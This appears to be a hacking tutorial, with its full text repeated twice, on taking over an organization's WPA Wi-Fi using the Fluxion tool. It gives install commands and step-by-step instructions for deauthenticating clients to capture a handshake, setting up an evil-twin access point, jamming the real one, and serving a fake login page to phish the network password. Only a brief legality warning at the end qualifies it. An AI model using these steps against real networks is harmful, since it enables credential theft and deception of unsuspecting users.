Our goal in this article will be to target an organization via its WPA encrypted Wi-Fi connection. We will launch an attack against users attached to the access point "Probe," capture a handshake, set up a cloned (evil twin) AP, jam the target AP, set up a fake login page, and confirm the captured password against the handshake. And hack the password.
Install Fluxion
git clone https://github.com/wi-fi-analyzer/fluxion
cd fluxion
sudo ./fluxion
sudo ./Installer.sh
A window will open to handle installing the missing packages. Be patient and let it finish installing dependencies
After all the dependencies are met, our board is green and we can proceed to the attack interface. Run the Fluxion command again with sudo ./fluxion to get hacking.
Scan Wi-Fi
It will take some times wait for 20-30seconds.
Press CTRL+C to stop the capture process whenever you spot the wireless network that you want.
Choose Your Target AP
Select a target with active clients for the attack to run on by entering the number next to it. Unless you intend to wait for a client to connect (possibly for a long time), this attack will not work on a network without any clients
Select Your Attack
Once you've typed the number of the target network, press enter to load the network profile into the attack selector. For our purpose, we will use option 1 to make a "FakeAP" using Hostapd. This will create a fake hotspot using the captured information to clone the target access point. Type 1 and press enter.
Get a Handshake
In order to verify that the password we receive is working, we will check it against a captured handshake. If we have a handshake, we can enter it at the next screen. If not, we can press enter to force the network to provide a handshake in the next step.
Using the Aircrack-ng method by selecting option 1 ("aircrack-ng"), Fluxion will send deauthentication packets to the target AP as the client and listen in on the resulting WPA handshake. When you see the handshake appear, as it does in the top right of the screenshot below, you have captured the handshake. Type 1 (for "Check handshake") and enter to load the handshake into our attack configuration.
Create the Fake Login Page
Select option 1, "Web Interface," to use the social engineering tool.
Select as language as victm.
Capture the Password
The user is directed to a fake login page, which is either convincing or not, depending on which you chose.
Entering the wrong password will fail the handshake verification, and the user is prompted to try again. Upon entering the correct password, Aircrack-ng verifies and saves the password to a text file while displaying it on the screen. The user is directed to a "thank you" screen as the jamming ceases and the fake access point shuts down.
You can verify your success by checking the readout of the Aircrack-ng screen.
Congratulations, you've succeeded in obtaining and verifying a password, supplied by targeting the "wetware." We've tricked a user into entering the password rather than relying on a preexisting flaw with the security.
Warning:
This Technique Could Be Illegal Without Permission
Legally, Fluxion combines scanning, cloning, creating a fake AP, creating a phishing login screen, and using the Aircrack-ng script to obtain and crack WPA handshakes. As such, it leaves signatures in router logs consistent with using these techniques. Most of these practices are illegal and unwelcome on any system you don't have permission to audit.
Install Fluxion
git clone https://github.com/wi-fi-analyzer/fluxion
cd fluxion
sudo ./fluxion
sudo ./Installer.sh
A window will open to handle installing the missing packages. Be patient and let it finish installing dependencies
After all the dependencies are met, our board is green and we can proceed to the attack interface. Run the Fluxion command again with sudo ./fluxion to get hacking.
Scan Wi-Fi
It will take some times wait for 20-30seconds.
Press CTRL+C to stop the capture process whenever you spot the wireless network that you want.
Choose Your Target AP
Select a target with active clients for the attack to run on by entering the number next to it. Unless you intend to wait for a client to connect (possibly for a long time), this attack will not work on a network without any clients
Select Your Attack
Once you've typed the number of the target network, press enter to load the network profile into the attack selector. For our purpose, we will use option 1 to make a "FakeAP" using Hostapd. This will create a fake hotspot using the captured information to clone the target access point. Type 1 and press enter.
Get a Handshake
In order to verify that the password we receive is working, we will check it against a captured handshake. If we have a handshake, we can enter it at the next screen. If not, we can press enter to force the network to provide a handshake in the next step.
Using the Aircrack-ng method by selecting option 1 ("aircrack-ng"), Fluxion will send deauthentication packets to the target AP as the client and listen in on the resulting WPA handshake. When you see the handshake appear, as it does in the top right of the screenshot below, you have captured the handshake. Type 1 (for "Check handshake") and enter to load the handshake into our attack configuration.
Create the Fake Login Page
Select option 1, "Web Interface," to use the social engineering tool.
Select as language as victm.
Capture the Password
The user is directed to a fake login page, which is either convincing or not, depending on which you chose.
Entering the wrong password will fail the handshake verification, and the user is prompted to try again. Upon entering the correct password, Aircrack-ng verifies and saves the password to a text file while displaying it on the screen. The user is directed to a "thank you" screen as the jamming ceases and the fake access point shuts down.
You can verify your success by checking the readout of the Aircrack-ng screen.
Congratulations, you've succeeded in obtaining and verifying a password, supplied by targeting the "wetware." We've tricked a user into entering the password rather than relying on a preexisting flaw with the security.
Warning:
This Technique Could Be Illegal Without PermissionLegally, Fluxion combines scanning, cloning, creating a fake AP, creating a phishing login screen, and using the Aircrack-ng script to obtain and crack WPA handshakes. As such, it leaves signatures in router logs consistent with using these techniques. Most of these practices are illegal and unwelcome on any system you don't have permission to audit.
